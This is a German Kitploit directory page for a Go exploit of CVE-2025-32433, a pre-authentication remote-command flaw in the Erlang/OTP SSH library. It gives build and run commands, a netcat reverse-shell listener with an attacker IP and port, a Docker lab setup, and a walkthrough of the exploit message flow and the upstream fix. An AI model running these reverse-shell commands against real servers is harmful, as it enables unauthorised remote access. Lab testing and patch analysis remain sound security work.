Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433-Remote-Shell — Go-basierter Exploit für CVE-2025-32433 | Kitploit
Tools/GitHubGitHub/meloppeitreet/cve-2025-32433-remote-shell
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsRemote-Access-Tool
GitHubmeloppeitreet/cve-2025-32433-remote-shell

CVE-2025-32433-Remote-Shell

Go-basierter Exploit für CVE-2025-32433

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

CVE-2025-32433 Remote-Shell

Go-basierter Exploit für CVE-2025-32433, der eine Remote-Bash-Shell zurückgibt.

Stark inspiriert vom Verständnis des Exploits aus ProDefense's PoC für CVE-2025-32433.

Ausführen des Exploits

root@kitploit:~
make

exploit.exe wird für Windows-Rechner ebenfalls durch das Cross-Compilation-Makefile bereitgestellt.

Führen Sie dann die Exploit-Binärdatei auf eine von 2 Arten aus:

Befehl

root@kitploit:~
./exploit <target-ip> <target-port> "<command>"

HINWEIS: Die Ausgabe des Befehls wird nicht zurückgegeben.

Reverse Shell

root@kitploit:~
nc -lnvp <attacker-port>
root@kitploit:~
./exploit <target-ip> <target-port> <attacker-ip> <attacker-port>

Einrichten der Umgebung

Mithilfe des ProDefense-Dockerfiles können Sie eine Umgebung wie folgt einrichten:

root@kitploit:~
docker build -t "cve-2025-32433:Dockerfile" .
root@kitploit:~
docker run -p 2222:2222 cve-2025-32433:Dockerfile

Sie können den Exploit dann wie im Abschnitt Ausführen des Exploits ausführen, z. B.:

root@kitploit:~
nc -lnvp 4444
root@kitploit:~
./exploit 127.0.0.1 2222 172.17.0.1 4444

172.17.0.1 ist die Standard-IP für den Docker-Host

Erklärung des Exploits

TL;DR „Das Problem wird durch einen Fehler in der SSH-Protokollnachrichtenverarbeitung verursacht, der es einem Angreifer ermöglicht, Verbindungsprotokollnachrichten vor der Authentifizierung zu senden,“

Typischer SSH-Ablauf:

root@kitploit:~
SSH_MSG_KEXINIT

→ SSH_MSG_KEXDH_INIT / KEX_ECDH_INIT (key exchange)
→ SSH_MSG_NEWKEYS
→ SSH_MSG_SERVICE_REQUEST ("ssh-userauth")
→ SSH_MSG_USERAUTH_REQUEST
→ SSH_MSG_USERAUTH_SUCCESS

→ SSH_MSG_CHANNEL_OPEN
→ SSH_MSG_CHANNEL_REQUEST

Exploit-Ablauf:

  1. TCP-Verbindung zum Opfer
  2. SSH-Banner-Austausch
  3. SSH_MSG_KEXINIT
  4. SSH_MSG_CHANNEL_OPEN (Pre-Auth)
  5. SSH_MSG_CHANNEL_REQUEST (Pre-Auth) --> enthält Befehlsnutzlast

Beachten Sie, dass der gesamte USERAUTH-Teil im Exploit übersprungen wird.

Zusammenfassung der Nachrichten

Relevante RFCs für SSH-Nachrichten:

  • RFC 4253: The Secure Shell (SSH) Transport Layer Protocol
  • RFC 4254: The Secure Shell (SSH) Connection Protocol

Nachrichtennummern

Nachrichtennummern im SSH-Transportprotokoll

Nachrichtennummern im SSH-Verbindungsprotokoll

Nachrichtenformate

SSH_MSG_KEXINIT

SSH_MSG_KEXINIT

SSH_MSG_CHANNEL_OPEN

SSH_MSG_CHANNEL_OPEN

SSH_MSG_CHANNEL_REQUEST

SSH_MSG_CHANNEL_REQUEST

Weitere Anforderungen

String-Format (aus RFC 4251: The Secure Shell (SSH) Protocol Architecture)

String

Padding

Padding

Den Fix und den Exploit verstehen

Das Folgende ist der Fix, der in den Erlang OTP Libraries im ssh: early RCE fix commit eingeführt wurde:

handle_msg

Der Fix führt eine neue handle_msg-Klausel ein, die anhand ihrer Argumente Folgendes abfängt:

  • Msg: Allzweck-Variable für alle eingehenden SSH-Nachrichten, die nicht bereits von früheren Klauseln abgedeckt werden (wie #ssh_msg_disconnect{})
  • #ssh{authenticated = false}: Sitzungszustand, der zutrifft, wenn die Verbindung noch nicht authentifiziert wurde.

Die Klausel fängt keine Sitzungen mit authenticated = true ab, welches der Sitzung zugewiesen wird, wenn der Server ein #ssh_msg_userauth_success{} empfängt:

authenticated = true

Sie wird nach dem Erfolg einer der folgenden Authentifizierungsmethoden gesendet:

Authentifizierungsmethoden, die #ssh_msg_userauth_success{} senden

Tool herunterladen